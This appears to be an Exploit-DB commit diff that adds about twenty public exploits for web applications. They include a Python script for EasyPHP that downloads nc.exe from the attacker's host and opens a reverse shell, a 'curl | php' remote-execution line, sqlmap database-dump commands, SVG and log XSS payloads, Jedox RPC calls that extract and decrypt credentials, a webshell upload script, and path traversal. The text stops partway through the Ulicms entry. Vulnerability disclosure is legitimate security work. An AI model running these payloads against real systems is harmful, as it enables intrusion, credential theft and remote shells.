DB: 2023-05-06

20 changes to exploits/shellcodes/ghdb Codigo Markdown Editor v1.0.1 (Electron) - Remote Code Execution Cmaps v8.0 - SQL injection EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and Path Traversal) File Thingie 2.5.7 - Remote Code Execution (RCE) Intern Record System v1.0 - SQL Injection (Unauthenticated) Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module Jedox 2022.4.2 - Code Execution via RPC Interfaces Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks Jedox 2022.4.2 - Remote Code Execution via Directory Traversal KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE) Online Pizza Ordering System v1.0 - Unauthenticated File Upload pluck v4.7.18 - Stored Cross-Site Scripting (XSS) Simple Task Managing System v1.0 - SQL Injection (Unauthenticated) Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE) Ulicms-2023.1 sniffing-vicuna - Stored Cross-Site Scripting (XSS) Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
2023-05-06 00:16:26 +00:00 · 2023-05-06 00:16:26 +00:00 · 8945b320b5
commit 8945b320b5
parent 668314bbda
20 changed files with 1332 additions and 3 deletions
--- a/exploits/multiple/local/51432.txt
+++ b/exploits/multiple/local/51432.txt
@ -0,0 +1,35 @@
 # Exploit Title: Codigo Markdown Editor v1.0.1 (Electron) - Arbitrary Code Execution
 # Date: 2023-05-03
 # Exploit Author: 8bitsec
 # Vendor Homepage: https://alfonzm.github.io/codigo/
 # Software Link: https://github.com/alfonzm/codigo-app
 # Version: 1.0.1
 # Tested on: [Mac OS 13]
 Release Date:
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 2023-05-03
 Product & Service Introduction:
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D
 A Markdown editor & notes app made with Vue & Electron
 Technical Details & Description:
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
 =3D=3D=3D=3D=3D=3D=3D
 A vulnerability was discovered on Codigo markdown editor v1.0.1 allowing a =
 user to execute arbitrary code by opening a specially crafted file.
 Proof of Concept (PoC):
 =3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
 Arbitrary code execution:
 Create a markdown file (.md) in any text editor and write the following pay=
 load:
 <video><source onerror=3D"alert(require('child_process').execSync('/System/=
 Applications/Calculator.app/Contents/MacOS/Calculator').toString());">
 Opening the file in Codigo will auto execute the Calculator application.
--- a/exploits/php/webapps/51274.txt
+++ b/exploits/php/webapps/51274.txt
@ -26,7 +26,7 @@ or exploit latest vulnerabilities in the underlying database.
 In sqlmap use 'phone', 'email', 'deptType' or 'name' parameter to dump 'department' database.
 Then run SQLmap to extract the data from the database:
-sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=test&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
+sqlmap.py -u "http://localhost/intern/controller.php" -p "deptType" --risk="3" --level="3" --method="POST" --data="phone=&email=&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
 sqlmap.py -u "http://localhost/intern/controller.php" -p "email" --risk="3" --level="3" --method="POST" --data="phone=&email=test&deptType=3&name=" --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36" --headers="Host:localhost\nAccept:text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\nAccept-Encoding:gzip, deflate\nAccept-Language:en-us,en;q=0.5\nCache-Control:no-cache\nContent-Type:application/x-www-form-urlencoded\nReferer:http://localhost/intern/" --dbms="MySQL" --batch --dbs -D department --dump
--- a/exploits/php/webapps/51419.txt
+++ b/exploits/php/webapps/51419.txt
@ -0,0 +1,48 @@
 ## Title: KodExplorer v4.51.03 - Pwned-Admin File-Inclusion - Remote Code Execution (RCE)
 ## Author: nu11secur1ty
 ## Date: 04.30.2023
 ## Vendor: https://kodcloud.com/
 ## Software: https://github.com/kalcaddle/KodExplorer/releases/tag/4.51.03
 ## Reference: https://portswigger.net/web-security/file-upload
 ## Description:
 By using this vulnerability remotely, the malicious pwned_admin can
 list and manipulate all files inside the server. This is an absolutely
 DANGEROUS and STUPID decision from the application owner! In this
 scenario, the attacker prepares the machine for exploitation and sends
 a link for remote execution by using the CURL protocol to his
 supporter - another attacker. Then and he waits for execution from his
 colleague, to mask his action or even more worst than ever. What a
 nice hack is this! :)
 STATUS: CRITICAL Vulnerability
 [+]Exploit:
 ```CURL
 curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/BiggusDickus.php
 | php
 curl -s https://pwnedhost.com/KodExplorer/data/User/pwnedadmin/home/desktop/dealdir.php
 | php
 ```
 ## Reproduce:
 [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/kalcaddle/2023/KodExplorerKodExplorer-4.51.03)
 ## Proof and Exploit:
 [href](https://streamable.com/98npd0)
 ## Time spend:
 01:15:00
 --
 System Administrator - Infrastructure Engineer
 Penetration Testing Engineer
 Exploit developer at https://packetstormsecurity.com/
 https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
 https://www.exploit-db.com/
 0day Exploit DataBase https://0day.today/
 home page: https://www.nu11secur1ty.com/
 hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/php/webapps/51420.txt
+++ b/exploits/php/webapps/51420.txt
@ -0,0 +1,77 @@
 Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
 Application: pluck
 Version: 4.7.18
 Bugs:  XSS
 Technology: PHP
 Vendor URL: https://github.com/pluck-cms/pluck
 Software Link: https://github.com/pluck-cms/pluck
 Date of found: 01-05-2023
 Author: Mirabbas Ağalarov
 Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. create .svg file.
 2. svg file content:
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)
 poc request
 POST /pluck-4.7.18/admin.php?action=files HTTP/1.1
 Host: localhost
 Content-Length: 672
 Cache-Control: max-age=0
 sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
 sec-ch-ua-mobile: ?0
 sec-ch-ua-platform: "Linux"
 Upgrade-Insecure-Requests: 1
 Origin: http://localhost
 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
 Sec-Fetch-Site: same-origin
 Sec-Fetch-Mode: navigate
 Sec-Fetch-User: ?1
 Sec-Fetch-Dest: document
 Referer: http://localhost/pluck-4.7.18/admin.php?action=files
 Accept-Encoding: gzip, deflate
 Accept-Language: en-US,en;q=0.9
 Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
 Connection: close
 ------WebKitFormBoundaryJMTiFxESCx7aNqmI
 Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
 Content-Type: image/svg+xml
 <?xml version="1.0" standalone="no"?>
 <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
 <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.location);
   </script>
 </svg>
 ------WebKitFormBoundaryJMTiFxESCx7aNqmI
 Content-Disposition: form-data; name="submit"
 Upload
 ------WebKitFormBoundaryJMTiFxESCx7aNqmI--
 4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg
--- a/exploits/php/webapps/51421.txt
+++ b/exploits/php/webapps/51421.txt
@ -0,0 +1,18 @@
 # Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
 # Date: 2023-05-02
 # Exploit Author: Ahmet Ümit BAYRAM
 # Vendor Homepage: https://wolf-cms.readthedocs.io
 # Software Link: https://github.com/wolfcms/wolfcms
 # Version: 0.8.3.1
 # Tested on: Kali Linux
 ### Steps to Reproduce ###
 # Firstly, go to the "Files" tab.
 # Click on the "Create new file" button and create a php file (e.g:
 shell.php)
 # Then, click on the file you created to edit it.
 # Now, enter your shell code and save the file.
 # Finally, go to https://localhost/wolfcms/public/shell.php
 ### There's your shell! ###
--- a/exploits/php/webapps/51422.txt
+++ b/exploits/php/webapps/51422.txt
@ -0,0 +1,46 @@
 # Exploit Title: Cmaps v8.0 - SQL injection
 - Date: 27.04.2023
 - Exploit Author: Lucas Noki (0xPrototype)
 - Vendor Homepage: https://github.com/vogtmh
 - Software Link: https://github.com/vogtmh/cmaps
 - Version: 8.0
 - Tested on: Mac, Windows, Linux
 - CVE : CVE-2023-29809
 *Description:*
 The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:
 ```html
 <b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />
 ```
 Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:
 ```
 '-(select*from(select+sleep(2)+from+dual)a)--+
 ```
 The page will sleep for two seconds. This confirms the SQL injection.
 *Steps to reproduce:*
 1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```
 2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.
   ```shell
   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump
   ```
 Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.
 ## Request to the server:
 <img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />
 ## Response from the server:
 Look at the response time.
 <img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />
--- a/exploits/php/webapps/51423.txt
+++ b/exploits/php/webapps/51423.txt
@ -0,0 +1,182 @@
 # Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces
 # Date: 28/04/2023
 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2022.4 (22.4.2) and older
 # CVE : CVE-2022-47879
 Introduction
 =================
 A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute its methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user.
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"Studio",
 			"getUserCreds"
 		]
 	]
 2) Using function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (Specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker.
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"conn",
 			"test_palo",
 			[
 				"<HOST>",
 				"<PORT>",
 				"",
 				"",
 				true,
 				null
 			]
 		]
 	]
 3) The function `Studio::getExternURI` can be used to generate a URL with embedded username and encrypted password of the currently authenticated user.
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"Studio",
 			"getExternURI",
 			[
 				0,
 				"",
 				[
 					0
 				],
 				{
 					"flag":1
 				}
 			]
 		]
 	]
 4) List all available database connections via `conn::ls`:
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"conn",
 			"ls",
 			[
 				null,
 				false,
 				true,
 				[
 					"type",
 					"active",
 					"description"
 				]
 			]
 		]
 	]
 5) Retrieve details of individual database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
 	PATH: /tc/rpc
 	METHOD: POST
 	BODY:
 	[
 		[
 			"com.jedox.etl.mngr.Connections",
 			"getGlobalConnection",
 			[
 				"<CONNECTION>"
 			]
 		]
 	]
 6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify encrypted credentials via ENCRYPTEDCREDS):
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"common",
 			"decrypt",
 			[
 				"<ENCRYPTEDCREDS>"
 			]
 		]
 	]
 7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify config param via CONFIG. For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"common",
 			"paloGet",
 			[
 				null,
 				"Config",
 				"#_config",
 				[
 					"config"
 				],
 				{
 					"config": [
 						"<CONFIG>"
 					]
 				},
 				true,
 				true
 			]
 		]
 	]
 8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"palo_mgmt",
 			"sess_list",
 			[
 				null
 			]
 		]
 	]
 9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"palo_mgmt",
 			"lic_users_list",
 			[
 				"0"
 			]
 		]
 	]
--- a/exploits/php/webapps/51424.txt
+++ b/exploits/php/webapps/51424.txt
@ -0,0 +1,28 @@
 # Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
 # Date: 28/04/2023
 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2022.4 (22.4.2) and older
 # CVE : CVE-2022-47875
 Introduction
 =================
 A Directory Traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have the permissions to upload files.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) This vulnerability can be exploited by first uploading a file using one of the existing file upload mechanisms (e.g. Import in Designer). When uploading a file, the web application returns the file system path in the JSON body of the HTTP response (look for `fspath`).
 2) Upload a PHP file and note the file system path (`fspath`)
 3) Get RCE via Directory Traversal
 	PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php
 	METHOD: POST
--- a/exploits/php/webapps/51425.txt
+++ b/exploits/php/webapps/51425.txt
@ -0,0 +1,34 @@
 # Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
 # Date: 28/04/2023
 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2020.2 (20.2.5) and older
 # CVE : CVE-2022-47877
 Introduction
 =================
 A Stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web scripts or HTML in the logs page via the log module. To exploit the vulnerability, the attacker must append an XSS payload to the log message.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) Store log entry with XSS payload:
 	PATH: /ub/ccmd
 	METHOD: POST
 	BODY:
 	[
 		[
 			"log",
 			"error",
 			"<img src=# onerror=\"alert('XSS')\">"
 		]
 	]
 2) Trigger XSS payload by opening the Logs page and showing the respective log entry.
--- a/exploits/php/webapps/51426.txt
+++ b/exploits/php/webapps/51426.txt
@ -0,0 +1,25 @@
 # Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Configurable Storage Path
 # Date: 28/04/2023
 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2020.2 (20.2.5) and older
 # CVE : CVE-2022-47878
 Introduction
 =================
 Incorrect input validation for the default storage path variable in the settings page allows remote, authenticated users to specify the location as web root directory. Consecutive file uploads can lead to the execution of arbitrary code. To exploit the vulnerability, the attacker sets the default storage path to the web root.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) In the UI in the application settings page the default storage path can be set to any value. This path could be set as the webroot directory of the webserver e.g. /htdocs/app/docroot/.
 2) Then any upload/import function can be used to upload a .php webshell file to the webroot.
 3) Execute webshell from the webroot directory to obtain RCE.
--- a/exploits/php/webapps/51427.txt
+++ b/exploits/php/webapps/51427.txt
@ -0,0 +1,28 @@
 # Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
 # Date: 28/04/2023
 # Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2020.2 (20.2.5) and older
 # CVE : CVE-2022-47876
 Introduction
 =================
 Jedox Integrator allows remote authenticated users to create Jobs to execute arbitrary code via Groovy-scripts. To exploit the vulnerability, the attacker must be able to create a Groovy-Job in Integrator.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) A user with appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following groovy script to execute `whoami`. The output of the command can be viewed in the logs:
 	def sout = new StringBuilder(), serr = new StringBuilder()
 	def proc = 'whoami'.execute()
 	proc.consumeProcessOutput(sout, serr)
 	proc.waitForOrKill(10000)
 	LOG.error(sout.toString());
 	LOG.error(serr.toString());
--- a/exploits/php/webapps/51428.txt
+++ b/exploits/php/webapps/51428.txt
@ -0,0 +1,56 @@
 # Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls
 # Date: 28/04/2023
 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2020.2 (20.2.5) and older
 # CVE : CVE-2022-47874
 Introduction
 =================
 Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) List all available database connections via `conn::ls` (see also: CVE-2022-47879):
 	PATH: /be/rpc.php
 	METHOD: POST
 	BODY:
 	[
 		[
 			"conn",
 			"ls",
 			[
 				null,
 				false,
 				true,
 				[
 					"type",
 					"active",
 					"description"
 				]
 			]
 		]
 	]
 2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:
 	PATH: /tc/rpc
 	METHOD: POST
 	BODY:
 	[
 		[
 			"com.jedox.etl.mngr.Connections",
 			"getGlobalConnection",
 			[
 				"<CONNECTION>"
 			]
 		]
 	]
--- a/exploits/php/webapps/51429.txt
+++ b/exploits/php/webapps/51429.txt
@ -0,0 +1,25 @@
 # Exploit Title: Jedox 2022.4.2 - Disclosure of Database Credentials via Connection Checks
 # Date: 28/04/2023
 # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
 # Vendor Homepage: https://jedox.com
 # Version: Jedox 2022.4 (22.4.2) and older
 # CVE : CVE-2022-47880
 Introduction
 =================
 An information disclosure vulnerability in `/be/rpc.php` allows remote authenticated users with the appropriate permissions to modify database connections to disclose the clear text credentials via the `test connection` function. To exploit the vulnerability, the attacker must set the host of the database connection to a server under his control.
 Write-Up
 =================
 See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability.
 Proof of Concept
 =================
 1) The host part of a database connection can be changed in the connections details in the UI. Set the Host to a server that you control.
 2) Test the database connection.
 3) The webserver initiates a connection to the server that you control. Use wireshark to capture network traffic and to ultimately extract the database credentials.
--- a/exploits/php/webapps/51430.txt
+++ b/exploits/php/webapps/51430.txt
@ -0,0 +1,116 @@
 # Exploit Title: EasyPHP Webserver 14.1 - Multiple Vulnerabilities (RCE and
 Path Traversal)
 # Discovery by: Rafael Pedrero
 # Discovery Date: 2022-02-06
 # Vendor Homepage: https://www.easyphp.org/
 # Software Link : https://www.easyphp.org/
 # Tested Version: 14.1
 # Tested on:  Windows 7 and 10
 # Vulnerability Type: Remote Command Execution (RCE)
 CVSS v3: 9.8
 CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 CWE: CWE-78
 Vulnerability description: There is an OS Command Injection in EasyPHP
 Webserver 14.1 that allows an attacker to achieve Remote Code Execution
 (RCE) with administrative privileges.
 Proof of concept:
 To detect:
 POST http://127.0.0.1:10000/index.php?zone=settings HTTP/1.1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:70.0)
 Gecko/20100101 Firefox/70.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 28
 Origin: http://127.0.0.1:10000
 Connection: keep-alive
 Referer: http://127.0.0.1:10000/index.php?zone=settings
 Host: 127.0.0.1:10000
 app_service_control=calc.exe
 The calculator opens.
 Exploit:
 # !/usr/bin/python3
 import requests
 import sys
 if len(sys.argv) != 5:
    print("RCE: EasyPHP Webserver 14.1 and before - by Rafa")
    print("Usage:   %s <TARGET> <TARGET_PORT> <LOCAL_IP> <LOCAL_PORT>" %
 sys.argv[0])
    print("Example:   %s 192.168.1.10 10000 192.168.1.11 9001" %
 sys.argv[0])
    exit(1)
 else:
    target = sys.argv[1]
    targetport = sys.argv[2]
    localip = sys.argv[3]
    localport = sys.argv[4]
    # python3 -m http.server / python2 -m SimpleHTTPServer with nc.exe in
 the directory
    payload =
 "powershell+-command+\"((new-object+System.Net.WebClient).DownloadFile('http://"
 + localip + ':8000' +
 "/nc.exe','%TEMP%\\nc.exe'))\";\"c:\windows\\system32\\cmd.exe+/c+%TEMP%\\nc.exe+"
 + localip + "+" + localport + "+-e+cmd.exe\""
    print (payload)
    url = 'http://' + target + ':' + targetport + '/index.php?zone=settings'
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)
 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4433.0 Safari/537.36"
    }
    data = {'app_service_control':payload}
    try:
        r = requests.post(url, headers=headers, data=data)
    except requests.exceptions.ReadTimeout:
        print("The payload has been sent. Check it!")
        pass
 # Vulnerability Type: Path Traversal
 CVSS v3: 6.5
 CVSS vector: 3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
 CWE: CWE-22
 Vulnerability description: An issue was discovered in EasyPHP Webserver
 14.1. An Absolute Path Traversal vulnerability in / allows remote users to
 bypass intended SecurityManager restrictions and download any file if you
 have adequate permissions outside the documentroot configured on the server.
 Proof of concept:
 GET /..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
 HTTP/1.1
 Host: 192.168.X.X:10000
 Connection: Keep-alive
 Accept-Encoding: gzip,deflate
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
 like Gecko) Chrome/41.0.2228.0 Safari/537.21
 Accept: */*
 HTTP/1.1 200 OK
 Host: 192.168.X.X:10000
 Connection: close
 Content-Type: application/octet-stream
 Content-Length: 499
 ; for 16-bit app support [fonts] [extensions] [mci extensions] [files]
 [Mail] MAPI=1 CMCDLLNAME32=mapi32.dll CMCDLLNAME=mapi.dll CMC=1 MAPIX=1
 MAPIXVER=1.0.0.1 OLEMessaging=1 [MCI Extensions.BAK] 3g2=MPEGVideo
 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo
 adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo
 m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo
 mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo
--- a/exploits/php/webapps/51431.py
+++ b/exploits/php/webapps/51431.py
@ -0,0 +1,74 @@
 # Exploit Title: Online Pizza Ordering System 1.0 - Unauthenticated File Upload
 # Date: 03/05/2023
 # Exploit Author: URGAN
 # Vendor Homepage: https://www.sourcecodester.com/php/16166/online-pizza-ordering-system-php-free-source-code.html
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-opos.zip
 # Version: v1.0
 # Tested on: LAMP Fedora Server 27 (Twenty Seven) Apache/2.4.34 (Fedora) 10.2.19-MariaDB PHP 7.1.23
 # CVE: CVE-2023-2246
 #!/usr/bin/env python3
 # coding: utf-8
 import os
 import requests
 import argparse
 from bs4 import BeautifulSoup
 # command line arguments
 parser = argparse.ArgumentParser()
 parser.add_argument('-u', '--url', type=str, help='URL with http://')
 parser.add_argument('-p', '--payload', type=str, help='PHP webshell')
 args = parser.parse_args()
 # if no arguments are passed, ask the user for them
 if not (args.url and args.payload):
    args.url = input('Enter URL with http://: ')
    args.payload = input('Enter file path PHP webshell: ')
 # URL Variables
 url = args.url + '/admin/ajax.php?action=save_settings'
 img_url = args.url + '/assets/img/'
 filename = os.path.basename(args.payload)
 files = [
  ('img',(filename,open(args.payload,'rb'),'application/octet-stream'))
 ]
 # send a POST request to the server
 resp_upl = requests.post(url, files = files)
 status_code = resp_upl.status_code
 if status_code == 200:
    print('[+] File uploaded')
 else:
    print(f'[-] Error {status_code}: {resp_upl.text}')
    raise SystemExit(f'[-] Script stopped due to error {status_code}.')
 # send a GET request to the server
 resp_find = requests.get(img_url)
 # Use BeautifulSoup to parse the page's HTML code
 soup = BeautifulSoup(resp_find.text, 'html.parser')
 # get all <a> tags on a page
 links = soup.find_all('a')
 # list to store found files
 found_files = []
 # we go through all the links and look for the desired file by its name
 for link in links:
    file_upl = link.get('href')
    if file_upl.endswith(filename): # uploaded file name
        print('[+] Uploaded file found:', file_upl)
        file_url = img_url + file_upl # get the full URL of your file
        found_files.append(file_url) # add the file to the list of found files
 # if the list is not empty, then display all found files
 if found_files:
    print('[+] Full URL of your file:')
    for file_url in found_files:
        print('[+] ' + file_url)
 else:
    print('[-] File not found')
--- a/exploits/php/webapps/51434.txt
+++ b/exploits/php/webapps/51434.txt
@ -0,0 +1,151 @@
 #Exploit Title: Ulicms-2023.1 sniffing-vicuna - Remote Code Execution (RCE)
 #Application: Ulicms
 #Version: 2023.1-sniffing-vicuna
 #Bugs:  RCE
 #Technology: PHP
 #Vendor URL: https://en.ulicms.de/
 #Software Link: https://www.ulicms.de/content/files/Releases/2023.1/ulicms-2023.1-sniffing-vicuna-full.zip
 #Date of found: 04-05-2023
 #Author: Mirabbas Ağalarov
 #Tested on: Linux
 2. Technical Details & POC
 ========================================
 steps:
 1. Login to account and edit profile.
 2.Upload new Avatar
